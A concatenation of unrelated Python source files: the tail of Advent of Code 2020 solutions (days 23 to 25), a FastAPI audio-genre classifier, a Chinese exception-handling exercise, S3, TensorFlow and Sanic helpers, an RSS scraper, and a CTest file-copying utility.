# If this would select one of the cups that was just picked up,
# the crab will keep subtracting one until it finds a cup
# that wasn't just picked up.
# If at any point in this process the value goes below
# the lowest value on any cup's label, it wraps around
# to the highest value on any cup's label instead.
for _ in range(list_len):
if _ == 0:
nextval = curval
nextval -= 1
#log.trace(f" chknextval={nextval}")
if nextval in [n1, n2, n3]:
#log.trace(f" is in outtakes")
continue
if nextval <= 0:
nextval = max(lkl.keys())+1
continue
else:
break
#log.trace(f" current={curval} picked={[n1, n2, n3]}, dest={nextval}")
# The crab places the cups it just picked up
# so that they are immediately clockwise of the destination cup.
# They keep the same order as when they were picked up.
next_end_val = lkl[nextval] # store end value
lkl[nextval] = n1 # break open the chain
# lkl[n1] == n2
# lkl[n2] == n3
lkl[n3] = next_end_val # close the chain again
# The crab selects a new current cup:
# the cup which is immediately clockwise of the current cup
curval = lkl[curval]
if rd % 1_000_000 == 0:
took_tm = int(time.time()) - start_tm
log.info(f"round={rd:,} time_taken sofar {took_tm}s")
out_lst = []
for i in range(list_len):
if i == 0:
#last_val = 1
last_val = curval
out_lst.append(last_val)
last_val = lkl[last_val]
return out_lst
def play_crabcups_game_opt(l, rounds=1):
log.info(f"[play_crabcups_game] started: l={l}, rounds={rounds}")
#lst = l.copy()
return play_crabcups_round_opt(l, rounds)
def score_crabcups_game_part2(l):
lst_len = len(l)
tgt_idx = (l.index(1)+1) % len(l)
if tgt_idx < lst_len - 2:
subl = l[tgt_idx : tgt_idx+2]
#log.info(subl)
else:
tgtidx1 = (tgt_idx+1) % lst_len
tgtidx2 = (tgt_idx+2) % lst_len
subl = [l[tgtidx1], l[tgtidx2]]
assert( 2 == len(subl) )
return subl[0] * subl[1]
# In[ ]:
# check part 1 game results and scores still valid...
tests = "389125467"
test_lst = mapl(int, list(tests))
res = play_crabcups_game_opt(test_lst, rounds=10)
log.info(f"test result={res}")
score1 = score_crabcups_game(res)
log.info(f"test result 10rds score part 1={score1}")
log.info(f"test result 10rds score part 2={score}")
assert( 92658374 == score1 )
score = score_crabcups_game_part2(res)
# still valid...
ins = aoc.read_file_to_str('in/day23.in').strip()
ins_lst = mapl(int, list(ins))
res = play_crabcups_game_opt(ins_lst, rounds=100)
log.info(f"Day 23 part 1 result={res}")
score1 = score_crabcups_game(res)
log.info(f"Day 23 part 1 solution: result 100rds score={score1}")
score = score_crabcups_game_part2(res)
log.info(f"Day 23 part 2 check: result 100rds score2={score}")
assert( 74698532 == score1 )
# In[ ]:
# test with long list for part 2
test2_lst = assemble_crabcups2_list(test_lst, num_cups = 1_000_000)
log.info("done")
assert( 1_000_000 == len(test2_lst) )
res = play_crabcups_game_opt(test2_lst, rounds=10_000_000)
log.info("done2")
score2 = score_crabcups_game_part2(res)
log.info(f"score2={score2}")
assert( 1_000_000 == len(res) )
assert( 149245887792 == score2 )
# In[ ]:
ins2_lst = assemble_crabcups2_list(ins_lst, num_cups = 1_000_000)
res = play_crabcups_game_opt(ins2_lst, rounds=10_000_000)
log.info("done2")
score2 = score_crabcups_game_part2(res)
log.info(f"Day 23 part 2 solution: score2={score2}")
# ### Day 24: Lobby Layout
#
# Hexagonal geometry and hexagonal 2d-coordinates.
#
# See red blob games site [Hexagonal Grids](https://www.redblobgames.com/grids/hexagons/)
# for thorough explanations.
# Thanks to colleague P S for the hint! \
# Last used in Advent of Code 2017, day 11. \
# Todays aoc hint: [Hexagonal tiling - Wikipedia](https://en.wikipedia.org/wiki/Hexagonal_tiling)
#
# In[ ]:
def cl(l):
"""Return compact list str representation."""
return str(l).replace(', ',',')
# Using pointy topped grid/geometry and axial coordinates.
# Using axis notation [q,r] here, q is west>east and r is south>north
hex2d_axial_pt_translations = {'e':[1,0], 'w':[-1,0], 'se':[0,1], 'sw':[-1,1], 'ne':[+1,-1], 'nw':[0,-1]}
def hex_axial_distance(a, b):
return int((abs(a[0] - b[0]) + abs(a[0] + a[1] - b[0] - b[1]) + abs(a[1] - b[1])) / 2)
# east, southeast, southwest, west, northwest, and northeast
# => e, se, sw, w, nw, and ne
def parse_day24_line(s):
log.debug(f"parse_day24_line in={s}")
out_trs = []
while len(s) > 0:
log.trace(f"out_trs={out_trs} rest={s}")
if len(s)>= 2 and s[:2] in ['se','sw','nw','ne']:
out_trs.append(s[:2])
s = s[2:]
elif len(s)>= 1 and s[:1] in ['e','w']:
out_trs.append(s[:1])
s = s[1:]
else:
raise Exception(f"unforeseen: {s}")
log.debug(f"parse_day24_line returns {cl(out_trs)}")
return out_trs
def parse_day24(los):
return mapl(lambda it: parse_day24_line(it), los)
def flip_day24_line(steps):
#flips = defaultdict(int)
c = (0,0)
for step in steps:
trans = hex2d_axial_pt_translations[step]
c = (c[0]+trans[0], c[1]+trans[1])
#flips[c] += 1
#return flips
return c
def flip_day24_lines(steps_lol):
flips = defaultdict(int)
c = (0,0)
for steps in steps_lol:
c = flip_day24_line(steps)
flips[c] += 1
return flips
# In[ ]:
test1 = 'esew'
flip_day24_line( parse_day24_line(test1) )
# In[ ]:
test2 = 'nwwswee'
flip_day24_line( parse_day24_line(test2) )
# In[ ]:
tests = """
sesenwnenenewseeswwswswwnenewsewsw
neeenesenwnwwswnenewnwwsewnenwseswesw
seswneswswsenwwnwse
nwnwneseeswswnenewneswwnewseswneseene
swweswneswnenwsewnwneneseenw
eesenwseswswnenwswnwnwsewwnwsene
sewnenenenesenwsewnenwwwse
wenwwweseeeweswwwnwwe
wsweesenenewnwwnwsenewsenwwsesesenwne
neeswseenwwswnwswswnw
nenwswwsewswnenenewsenwsenwnesesenew
enewnwewneswsewnwswenweswnenwsenwsw
sweneswneswneneenwnewenewwneswswnese
swwesenesewenwneswnwwneseswwne
enesenwswwswneneswsenwnewswseenwsese
wnwnesenesenenwwnenwsewesewsesesew
nenewswnwewswnenesenwnesewesw
eneswnwswnwsenenwnwnwwseeswneewsenese
neswnwewnwnwseenwseesewsenwsweewe
wseweeenwnesenwwwswnew
""".strip().split("\n")
flips = flip_day24_lines( parse_day24(tests) )
tiles_black = filterl(lambda it: flips[it] % 2 == 1, flips.keys())
log.info(f"Day 24 part 1 tests solutions: black tiles#={len(tiles_black)}") #" from {tiles_black}")
assert( 10 == len(tiles_black))
# In[ ]:
ins = aoc.read_file_to_list('in/day24.in')
flips = flip_day24_lines( parse_day24(ins) )
tiles_black = filterl(lambda it: flips[it] % 2 == 1, flips.keys())
log.info(f"Day 24 part 1 solution: black tiles#={len(tiles_black)}") #" from {tiles_black}")
# In[ ]:
print("Day 24 b")
# cellular automaton on this hexagonal tile geometry space
def get_extents(tiles_black):
qs = mapl(lambda it: it[0], tiles_black)
rs = mapl(lambda it: it[1], tiles_black)
return [[min(qs), max(qs)], [min(rs), max(rs)]]
def num_neighbors(c, tiles_black):
nsum = 0
for tilec in tiles_black:
#if c != tilec and hex_axial_distance(c, tilec) == 1:
if hex_axial_distance(c, tilec) == 1:
log.trace(f"{tilec} is neib of {c}")
nsum += 1
assert( nsum <= 6 )
return nsum
def cell_automate(tiles_black, rounds = 1):
exts = get_extents(tiles_black)
log.info(f"[cell_automate] at round 0: num-tiles-black={len(tiles_black)}; extents={exts}") #" from {sorted(tiles_black)}")
start_tm = int(time.time())
for rnd in range(1, rounds+1):
new_tiles_black = tiles_black.copy()
exts = get_extents(tiles_black)
log.debug(f"round {rnd}: extents found={exts}")
q_min, q_max = exts[0]
r_min, r_max = exts[1]
for q in range(q_min-1, q_max+1+1):
for r in range(r_min-1, r_max+1+1):
c = (q, r)
nneibs = num_neighbors(c, tiles_black)
if c in tiles_black:
if nneibs == 0 or nneibs > 2:
log.debug(f"flip-to-white {c} nneibs={nneibs}")
new_tiles_black.remove(c)
else:
if nneibs == 2:
log.debug(f"flip-to-black {c} nneibs={nneibs}")
new_tiles_black.append(c)
tiles_black = new_tiles_black
took_tm = int(time.time()) - start_tm
log.info(f" after round {rnd} @{took_tm:>5}s: num-tiles-black={len(tiles_black)}; extents={exts}") #" from {sorted(tiles_black)}")
log.info(f"[cell_automate] finished round {rnd}: num-tiles-black={len(tiles_black)}; extents={exts}") #" from {sorted(tiles_black)}")
return tiles_black
flips = flip_day24_lines( parse_day24(tests) )
tiles_black = filterl(lambda it: flips[it] % 2 == 1, flips.keys())
assert 10 == len(tiles_black)
tiles_black2 = cell_automate(tiles_black, rounds=1)
assert 15 == len(tiles_black2)
tiles_black2 = cell_automate(tiles_black, rounds=2)
assert 12 == len(tiles_black2)
tiles_black2 = cell_automate(tiles_black, rounds=10)
assert 37 == len(tiles_black2)
tiles_black2 = cell_automate(tiles_black, rounds=20)
assert 132 == len(tiles_black2)
if EXEC_RESOURCE_HOGS:
tiles_black2 = cell_automate(tiles_black, rounds=100)
assert 2208 == len(tiles_black2)
# In[ ]:
if EXEC_RESOURCE_HOGS:
flips = flip_day24_lines( parse_day24(ins) )
tiles_black = filterl(lambda it: flips[it] % 2 == 1, flips.keys())
log.info(f"Day 24 part 1 solution: black tiles#={len(tiles_black)}") #" from {tiles_black}")
tiles_black2 = cell_automate(tiles_black, rounds=100)
log.info(f"Day 24 part 2 solution: black tiles#={len(tiles_black2)}") #" from {tiles_black}")
# took 1496 seconds!
# ### Day 24: Combo Breaker
# In[ ]:
def find_loopsize(pubkey, max_iter=100_000):
subjectnum = 7
val = 1
for i in range(1, max_iter+1):
val = (val * subjectnum) % 20201227
if val == pubkey:
break
if i == max_iter:
raise Exception("failsafe")
return i
def encrypt_day25(subjectnum=7, loopsize=None):
log.info(f"[encrypt_day25] subject#={subjectnum}, loopsize={loopsize}")
val = 1
for i in range(loopsize):
val = (val * subjectnum) % 20201227
return val
# In[ ]:
tests = """
5764801
17807724
""".strip()
# In[ ]:
card_pubkey, door_pubkey = mapl(int, tests.split("\n"))
log.info("tests card-pubkey={card_pubkey}, door pubkey=(door_pubkey)")
card_loopsize = find_loopsize(card_pubkey)
door_loopsize = find_loopsize(door_pubkey)
log.info(f"tests result: card-loopsize={card_loopsize}, door_loopsize={door_loopsize}")
t1 = encrypt_day25(subjectnum=door_pubkey, loopsize=card_loopsize)
t2 = encrypt_day25(subjectnum=card_pubkey, loopsize=door_loopsize)
log.info(f"tests result: encryption key={t1} : encrypted {t1} =? {t2}")
assert( t1 == t2 )
# In[ ]:
ins = aoc.read_file_to_list('in/day25.in')
card_pubkey, door_pubkey = mapl(int, ins)
log.info(f"card-pubkey={card_pubkey}, door pubkey={door_pubkey}")
card_loopsize = find_loopsize(card_pubkey, max_iter=10_000_000)
door_loopsize = find_loopsize(door_pubkey, max_iter=10_000_000)
log.info(f"intermed result: card-loopsize={card_loopsize:,}, door_loopsize={door_loopsize:,}")
t1 = encrypt_day25(subjectnum=door_pubkey, loopsize=card_loopsize)
t2 = encrypt_day25(subjectnum=card_pubkey, loopsize=door_loopsize)
log.info(f"Day 25 solution: encryption key={t1} : encrypted {t1} =? {t2}")
# In[ ]:
|
from fastapi import FastAPI, File, UploadFile, APIRouter, HTTPException
import logging
import joblib
from tensorflow.keras.models import load_model
import librosa
from app.dtos.data_model import Prediction
from app.services.feature_extraction import extract_audio_file_features
import os
import tempfile
router = APIRouter()
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
model_path = "./models/musicgenre_nn_classifier_CSV-V2.h5"
scaler_path = "./models/musicgenre_standard_scaler_CSV-V2.bin"
encoder_path = "./models/musicgenre_encoder_CSV-V2.bin"
model = load_model(model_path)
std_scaler = joblib.load(scaler_path)
classes = joblib.load(encoder_path).classes_
@router.post("", response_model=Prediction)
async def upload_sound_and_predict(audio_file: UploadFile = File(...)):
"""The uploaded file should be a valid mp3 file of a song."""
extension = os.path.splitext(audio_file.filename)[1]
logger.info(f"Processing: {audio_file.filename}")
_, path = tempfile.mkstemp(prefix='parser_', suffix=extension)
logger.info(f"Generated '{path}' temporary file ")
if extension != ".mp3":
raise HTTPException(status_code=400, detail="Uplaoded file should have an mp3 extension")
try:
with open(path, 'ab') as f:
for chunk in iter(lambda: audio_file.file.read(10000), b''):
f.write(chunk)
std_audio_data = extract_audio_file_features(path, std_scaler)
y_prob = model.predict(std_audio_data)
y_pred = classes[y_prob.argmax(axis=-1)[0]]
return {"filename": audio_file.filename, "predicted": y_pred, "extracted_features": list(std_audio_data[0])}
except Exception as e:
logger.error(f"Error while processing file: {str(e)}")
raise HTTPException(status_code=500, detail="Error while processing audio file.")
finally:
# remove temp file
os.close(_)
os.remove(path)
|
# @Time :2019/7/6 7:51
# @Author :jinbiao
# 一、必做题
# 1.什么是异常?为什么要捕获异常?
# 异常就是程序在运行时发生的错误
# 可以在程序抛出异常后不终止程序,增加程序的容错性
# 2.异常的完整语法格式
try:
pass # 可能出现异常的代码块,异常在此抛出
except: # 捕获异常,可指定异常类型
pass # 成功捕获后执行的代码块
# 3.在异常中,try关键字下的块语句、except下的块语句、else下的块语句、finally下的块语句执行逻辑是什么?
try:
pass # 如果出现错误,将会抛出异常
except:
pass # 捕获异常后,执行except下的代码块
else:
pass # 没有抛出异常时,执行else下的代码块
finally: # 无论有没有抛出异常,都会执行finally下的代码块
pass
# 4.编写如下程序
# 优化去生鲜超市买橘子程序
# a.收银员输入橘子的价格,单位:元/斤
# b.收银员输入用户购买橘子的重量,单位:斤
# c.计算并且 输出 付款金额
# 新需求:
# d.使用捕获异常的方式,来处理用户输入无效数据的情况。
# def count_price(unit_price, weight):
# total_price = unit_price * weight
# return total_price
#
#
# while True:
# try:
# unit_price = float(input("请输入橘子的单价"))
# weight = float(input("请输入橘子的重量"))
# except Exception:
# print("请输入正确的格式")
# else:
# a = count_price(unit_price=unit_price, weight=weight)
# print(a)
# break
# 5.编写如下程序
# 优化剪刀石头布优秀程序
# a.提示用户输入要出的拳 —— 石头(1)/剪刀(2)/布(3)
# b.电脑随机出拳
# c.比较胜负,显示用户胜、负还是平局
# 新需求:
# d.使用捕获异常的方式,来处理用户输入无效数据的情况
# e.多次进行游戏,可以让用户选择退出游戏,退出后需要显示胜利情况,例如:用户5局胜、3局败、2局平
# f.当程序结束之后,要求下一次运行程序能够获取用户历史胜负情况
# h.如果使用文件保存用户历史胜负数据,需要使用异常来处理文件不存在的情况(选做)
import random
with open("game_file.txt", mode="r", encoding="utf8") as read_game_file:
game_data = read_game_file.read()
if len(game_data) > 0:
data_list = game_data.split(",")
win_count, lose_count, draw_count = int(data_list[1]), int(data_list[2]), int(data_list[3])
else:
win_count, lose_count, draw_count = 0, 0, 0
# 猜拳判断
def morra(gesture):
"""
猜拳结果逻辑判断
:param gesture: 用户出的什么
:return: 结果和次数
"""
global win_count, lose_count, draw_count
dict1 = {1: "石头", 2: "剪刀", 3: "布"}
user = list(dict1.keys())[list(dict1.values()).index(gesture)]
computer = random.randint(1, 3)
print("电脑出的是{:s}".format(dict1[computer]))
print("用户出的是{:s}".format(gesture))
if (user == 1 and computer == 2) or (user == 2 and computer == 3) or (user == 3 and user == 1):
result = "你赢啦"
win_count += 1
elif user == computer:
result = "你们实力相当,平手啦"
draw_count += 1
else:
result = "你输啦"
lose_count += 1
return result, win_count, lose_count, draw_count
# 退出游戏存档
def on_file(*args):
"""
将游戏结果数据保存到txt文件中,方便下次读取
:param args: 游戏数据
:return: None
"""
with open("game_file.txt", mode="w", encoding="utf8") as write_game_file:
for i in args:
write_game_file.write(str(i)+",")
# 用户进行猜拳游戏
with open("game_file.txt", mode="r", encoding="utf8") as read_game_file:
a = read_game_file.read()
if len(a) >0:
data_list = a.split(",")
print("您的历史战绩为赢{}次,输{}次,平{}次".format(data_list[1], data_list[2], data_list[3]))
while True:
try:
gesture = str(input("请猜拳"))
onelist = morra(gesture)
print(onelist[0])
quit_game = str(input("是否退出游戏"))
if quit_game == "是":
print("本次游戏结束,你战绩为:赢{}次,输{}次,平{}次".format(onelist[1], onelist[2], onelist[3]))
on_file(*onelist)
break
except Exception as e:
print("输入有误,请重新输入"+e)
|
import pygame
from collections import deque
BACKGROUND_COLOR = "#00c000"
GOD = deque([pygame.K_g, pygame.K_o, pygame.K_d])
BOM = deque([pygame.K_b, pygame.K_o, pygame.K_m])
FLY = deque([pygame.K_f, pygame.K_l, pygame.K_y])
|
import boto3
import logging
from mmvizutil.compression.utils import make_stream
from mmvizutil.decorators import _retry
log_fmt = '[%(asctime)s - %(levelname)s] - %(name)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=log_fmt)
logger = logging.getLogger('mmvizutil-aws')
def _resource():
return boto3.resource('s3')
def _client():
return boto3.client('s3')
class S3Pointer(object):
def __init__(self, bucket, key):
self.bucket = bucket
self.key = key
@classmethod
def upload(cls, bucket, key, data):
"""
upload a bytes or seekable file-like object to the given
bucket in s3
"""
pointer = cls(bucket, key)
s3 = _resource()
resource = s3.Object(pointer.bucket, pointer.key)
bdata = make_stream(data)
response = _retry(resource.put)(Body=bdata)
return response
@classmethod
def simple_read(cls, bucket, key):
"""
a simple read of a file in s3, this is best used for
smaller files as it reads everything into memory
"""
pointer = cls(bucket, key)
s3 = _resource()
resource = s3.Object(pointer.bucket, pointer.key)
resp = resource.get()
yield resp['Body'].read()
def list_fns(self, **kwargs):
"""
return all file names within a given namespace in an
s3 bucket with the option to use prefixes and other
filters to limit the number of options returned
"""
client = _client()
resp = _retry(client.list_objects_v2)(**kwargs)
contents = resp.get('Contents')
if not contents:
args = ' '.join(['{} = {}\n'.format(k, v) for k, v in kwargs.items()])
logger.info('The query with the following params returned no results:\n{}'.format(args))
yield
yield from contents
|
import tensorflow as tf
filename_queue = tf.train.string_input_producer(["../../DataSets/training_label.csv"])
print(filename_queue)
reader = tf.TextLineReader()
value = reader.read(filename_queue)
print(value)
# Default values, in case of empty columns. Also specifies the type of the
# decoded result.
record_default = [[4], [2], [2]]
col1, col2, col3 = tf.decode_csv(value, record_defaults=record_default)
with tf.Session() as sess:
# Start populating the filename queue.
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
for i in range(1200):
# Retrieve a single instance:
example, label = sess.run([col3])
coord.request_stop()
coord.join(threads) |
# -*-coding:utf-8 -*-
__author__ = '$'
import sys
sys.path.append('..')
import tensorflow as tf
import numpy as np
import re
import os
import time
import datetime
import lstm_model
from lstm_model import LSTM_Attention
import csv
import jisuan
import data_helpers
# Parameters
# ==================================================
# Misc Parameters
tf.flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
tf.flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
FLAGS = tf.flags.FLAGS
print("\nParameters:")
for attr, value in sorted(FLAGS.__flags.items()):
print("{}={}".format(attr.upper(), value))
print("")
x_text1,y = data_helpers.load_data_and_labels('test.csv','train.csv') # 载入测试集样例 与 标签
y = np.argmax(y,1)
max_length = max([len(x) for x in x_text1]) # 单个样例最大长度
print('max-length',max_length)
x_text = []
for x in x_text1:
x=' '.join(x)
x_text.append(x)
vocab_path = os.path.join('lstm_runs/1531792671','vocab')
vocab_processor = tf.contrib.learn.preprocessing.VocabularyProcessor.restore(vocab_path) # 载入词表
x = np.array(list(vocab_processor.transform(x_text))) # 将输入词转换为相对应索引
# 从scores中取出前五 get label using probs
def get_label_using_probs(scores, top_number=5):
index_list = np.argsort(scores)[-top_number:]
index_list = index_list[::-1]
return index_list
# =====================评 估=============================
print("Evaluating...\n")
checkpoint_file = tf.train.latest_checkpoint('lstm_runs/1531792671/checkpoints')
# print(checkpoint_file)
graph = tf.Graph()
with graph.as_default():
session_conf = tf.ConfigProto(
allow_soft_placement=FLAGS.allow_soft_placement,
log_device_placement=FLAGS.log_device_placement)
sess = tf.Session(config=session_conf)
with sess.as_default():
saver = tf.train.import_meta_graph('{}.meta'.format(checkpoint_file))
saver.restore(sess, checkpoint_file)
input_x1 = graph.get_operation_by_name('input_x1').outputs[0] # 获取输入的占位符
dropout_keep_prob = graph.get_operation_by_name('dropout_keep_prob').outputs[0]
predictions = graph.get_operation_by_name('output/predictions').outputs[0]
b_size = graph.get_operation_by_name('batch_size').outputs[0]
# Generate batches
batches = data_helpers.batch_iter(
list(x),
1,
1 ,shuffle=False)
all_predictions = []
for x_batch in batches:
# print(type(x_batch[0][0][0]))
batch_predictions = sess.run(predictions,{input_x1:x_batch , dropout_keep_prob:1.0 ,b_size:1})
all_predictions = np.concatenate([all_predictions, batch_predictions])
correct_predictions = float(sum(all_predictions ==y))
print('测试集样例总数:{}'.format(len(y)))
print('Accuracy: {}'.format(correct_predictions/float(len(y))))
with open('lstm_result/score.csv', 'w') as fw:
writer = csv.writer(fw)
writer.writerow(['5类问题'])
print('5类问题:')
L0, T0 = jisuan.lingmingdu_5(all_predictions, y, 0.0) # 返回(灵敏度,特异度)
L1, T1 = jisuan.lingmingdu_5(all_predictions, y, 1.0)
L2, T2 = jisuan.lingmingdu_5(all_predictions, y, 2.0)
L3, T3 = jisuan.lingmingdu_5(all_predictions, y, 3.0)
L4, T4 = jisuan.lingmingdu_5(all_predictions, y, 4.0)
writer.writerows([['第几类', '灵敏度', '特异度'],
[0, L0, T0],
[1, L1, T1],
[2, L2, T2],
[3, L3, T3],
[4, L4, T4]])
writer.writerow(['2类问题'])
print('2类问题:')
L0, T0, L1, T1 = jisuan.lingmingdu_2(all_predictions, y)
writer.writerows([['第几类', '灵敏度', '特异度'],
[0, L0, T0],
[1, L1, T1]])
l0 = 0
l1 = 0
l2 = 0
l3 = 0
l4 = 0
for cla in y:
if cla == 0.0:
l0 += 1
elif cla == 1.0:
l1 += 1
elif cla == 2.0:
l2 += 1
elif cla == 3.0:
l3 += 1
else:
l4 += 1
print('测试集各类数量:')
print('0/1/2/3/4', l0, ',', l1, ',', l2, ',', l3, ',', l4)
writer.writerows([['测试集各类数量'],
[l0, l1, l2, l3, l4]])
# 保存 评价结果
predictions_human_readable = np.column_stack((np.array(x), all_predictions))
out_path = os.path.join('result', 'prediction.csv')
print('保存 evaluation 到 {0}'.format(out_path))
with open(out_path, 'w') as f:
csv.writer(f).writerows(predictions_human_readable)
|
from flask.ext.api import FlaskAPI
import couchdb
server = couchdb.Server()
update = False
try:
db = server['peleton-db']
except:
db = server.create('peleton-db')
update = True
if update:
db.update([{"_id": "A", "list": [2, 3, 8], "idx": 0}, {"_id": "B", "list": [4, 5, 6], "idx": 0}])
db.update([{"_id": "merge"}])
app = FlaskAPI(__name__)
from app import routes
from routes import quiz
app.register_blueprint(quiz) |
import os
f = open("../Rakuten-real-/userID150-165.csv")
a = []
for i in f:
a.append(i[:-1])
for k in range(16):
g = open("../rakutendb/150-165/"+str(a[k])+".csv")
print "user_number:"+str(k)
print a[k]
count = 0
for line in g:
p = line.split(",")
if p[0].find("http") > -1:
continue
count += 1
if os.path.exists("../rakutendb/item_vec_ae150-165ver1/"+p[0]+".csv") == False:
print p[0]
print count
break
|
"""MIPT Python Course Lections 22"""
print('Граф')
M, N = [int(x) for x in input().split()]
V = []
index = {}
A = [[0] * N for i in range(N)]
for i in range(N):
v1, v2 = input().split()
for v in v1, v2:
if v not in index:
V.append(v)
index[v] = len(V) - 1
v1_i = index[v1]
v2_i = index[v2]
print(index)
M, N = [int(x) for x in input().split()]
G = {}
for i in range(N):
v1, v2 = input().split()
for v, u in (v1, v2), (v2, v1):
if v not in G:
G[v] = {u}
else:
G[v].add(u)
|
#!/usr/bin/env python
# coding=utf-8
from feedformatter import Feed
import datetime
import time
try:
import urllib2
PY2 = True
except ImportError:
import requests
PY2 = False
def findSection(text, start, end, includeStart = False, includeEnd = False):
startIndex = text.find(start)
if not includeStart:
startIndex = startIndex + len(start)
endIndex = text.find(end, startIndex)
if includeEnd:
endIndex = endIndex + len(end)
return text[startIndex:endIndex]
def getData(url):
if PY2:
html = urllib2.urlopen(url).read()
else:
html = requests.get(url).text
result = {}
section = findSection(html, '<tbody class="style5">', '</table>')
imageHtml = findSection(section, '<img', '>')
result['dateFormatted'] = findSection(section, '<nobr>', ': </nobr>').strip()
result['imageUrl'] = 'http://sinfest.net/' + findSection(imageHtml, 'src="', '"')
result['date'] = findSection(imageHtml, 'btphp/comics/', '.gif')
result['title'] = findSection(imageHtml, 'alt="', '"')
result['url'] = 'http://sinfest.net/view.php?date=%s' % (result['date'])
# sinfest no longer uses Project Wonderful and new ads don't seem to have a noscript section
result['ad'] = ''
return result
try:
todaysSinfest = getData('http://sinfest.net/')
except Exception as e:
print(e)
today = datetime.date.today()
todaysSinfest = {'title': 'could not fetch', 'url': '', 'imageUrl': '',
'dateFormatted': today.strftime('%d %b %Y'),
'date': today.strftime('%Y-%m-%d') }
# Create the feed.
feed = Feed()
# Set the feed/channel level properties.
feed.feed['title'] = 'Sinfest RSS'
feed.feed['link'] = 'http://www.sinfest.net'
feed.feed['author'] = 'Tatsuya Ishida'
feed.feed['description'] = 'RSS feed for Sinfest'
# Suggest checking every 12 hours. Normally content will update every 24 hours.
# This is an attempt to tell clients there's no point checking the feed
# every 5 minutes - it's not a big deal load-wise, but it is pointless.
feed.feed['ttl'] = '720'
# Create an item.
# For this basic feed, I'll only include the latest comic.
item = {}
item['link'] = todaysSinfest['url']
item['guid'] = todaysSinfest['date']
item["pubDate"] = time.localtime()
item['title'] = 'Sinfest for %s: %s' % (todaysSinfest['dateFormatted'], todaysSinfest['title'])
if todaysSinfest['imageUrl'] != '':
item['summary'] = '<img src="%s" /><br/><br/>%s' % (todaysSinfest['imageUrl'], todaysSinfest['ad'])
else:
item['summary'] = 'image not found'
# Add item to feed.
feed.items.append(item)
# Save the feed to a file.
with open('rss2.xml', 'w') as f:
f.write(feed.format_rss2_string())
f.write('\n') # Ensure file ends in EOL
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__license__ = ''
__version__ = '1.0.1'
from sanic.log import logger
from sanic.request import Request
from .specification.get_account_type_specification import (
get_account_type_list_query, get_account_type_list_count_query, get_account_type_list_dropdown_query
)
__all__ = [
# SERVICES WORKING ON ACCOUNT TYPE TABLE
'get_account_type_list', 'get_account_type_list_count', 'get_account_type_dropdown_list'
]
async def get_account_type_list(request: Request, name=None, limit: int = 0, offset: int = 0) -> list:
""" Get account_type list ordered by account_type id desc.
:param request:
:param name:
:param limit:
:param offset:
:return:
"""
ret_val = []
query_str = get_account_type_list_query
try:
if limit > 0:
query_str += ' LIMIT $2 OFFSET $3 ORDER BY atc.id DESC;'
async with request.app.pg.acquire() as connection:
rows = await connection.fetch(query_str, name, limit, offset)
else:
query_str += ' ORDER BY atc.id DESC;'
async with request.app.pg.acquire() as connection:
rows = await connection.fetch(query_str, name)
if rows is not None:
ret_val = [dict(x) for x in rows]
except Exception as gclerr:
logger.error('get_account_type_list service erred with: {}'.format(gclerr))
return ret_val
async def get_account_type_list_count(request: Request, name=None) -> int:
""" Get city list count.
:param request:
:param name:
:return:
"""
ret_val = 0
query_str = get_account_type_list_count_query
try:
async with request.app.pg.acquire() as connection:
row = await connection.fetchval(query_str, name)
if row is not None:
ret_val = row
except Exception as gclcerr:
logger.error('get_account_type_list_count service erred with: {}'.format(gclcerr))
return ret_val
async def get_account_type_dropdown_list(request: Request, name=None) -> list:
""" Get account_type list ordered by account_type id desc.
:param request:
:param name:
:return:
"""
ret_val = []
query_str = get_account_type_list_dropdown_query
try:
query_str += ' ORDER BY atc.id DESC;'
async with request.app.pg.acquire() as connection:
rows = await connection.fetch(query_str, name)
if rows is not None:
ret_val = [dict(x) for x in rows]
except Exception as gclerr:
logger.error('get_account_type_dropdown_list service erred with: {}'.format(gclerr))
return ret_val
|
#Exemplo de if(se) encadeados
#Existe abreviação do else com if elif que permite adicionar mais uma condição
idade = 14
if(idade >= 18) :
print("Já pode tirar CNH!")
elif (idade >= 16):
print("Já pode VOTAR!")
elif (idade >= 15) :
print("Já debutou!")
else:
print("Você tem menos que 15 anos")
print ("FIM DO CÓDIGO")
|
#!/usr/bin/env python
"""
CTestTestfile.py
==================
This enables ctest running of installed tests,
without the full build tree.
CTestTestfile.cmake files which list unit tests are copied
from the build tree into a newly created tree with only these files.
A top level CTestTestfile.cmake composed of top level subdirs is added,
which allows all tests to be run with a single ctest command.
Usage Example
---------------
Note that the destination directory is deleted and populated on every run
::
[blyth@localhost ~]$ CTestTestfile.py $(opticks-bdir) --dest /tmp/tests
remove dest tree /tmp/tests
Copying CTestTestfile.cmake files from buildtree /home/blyth/local/opticks/build into a new destination tree /tmp/tests
write testfile to /tmp/tests/CTestTestfile.cmake
Workflow
-----------
::
CTestTestfile.py $(opticks-bdir) --dest /tmp/tests
cd /tmp/tests
ctest.sh
simple ctest wrapper to tee ctest.log and set non-interactive options
ctest -N
list names of tests without running them
ctest -N -R SysRapTest.SEnvTest
ctest -N -R IntegrationTests
list tests matching a patterm
ctest -R IntegrationTests --output-on-failure
run tests matching a pattern
"""
import sys, re, os, logging, argparse, shutil
from opticks.bin.CMakeLists import OpticksCMakeProj
log = logging.getLogger(__name__)
class BuildTree(object):
NAME = "CTestTestfile.cmake"
SKIPDIRS = ["CMakeFiles", "Testing", ]
def __init__(self, root, projs):
self.root = root
self.projs = projs
log.info("root %s " % root)
log.info("projs %r " % projs)
def filtercopy(self, dstbase):
for proj in self.projs:
src = os.path.join(self.root, proj)
dst = os.path.join(dstbase, proj)
if os.path.isdir(dst):
log.debug("remove dst tree %s " % dst )
shutil.rmtree( dst )
pass
shutil.copytree( src, dst, symlinks=False, ignore=self )
pass
top = os.path.join( dstbase, self.NAME )
return top
def skipdir(self, name):
return name in self.SKIPDIRS
def skipfile(self, name):
return not name == self.NAME
def __call__(self, src, names):
ignore = []
for name in names:
path = os.path.join(src, name)
if os.path.isdir(path) and not self.skipdir(name): continue
if os.path.isfile(path) and not self.skipfile(name): continue
# contining will not ignore, so will select
ignore.append(name)
pass
return ignore
if __name__ == '__main__':
parser = argparse.ArgumentParser(__doc__)
parser.add_argument( "root", nargs=1, help="Base directory in which to look for CTestTestfile.cmake " )
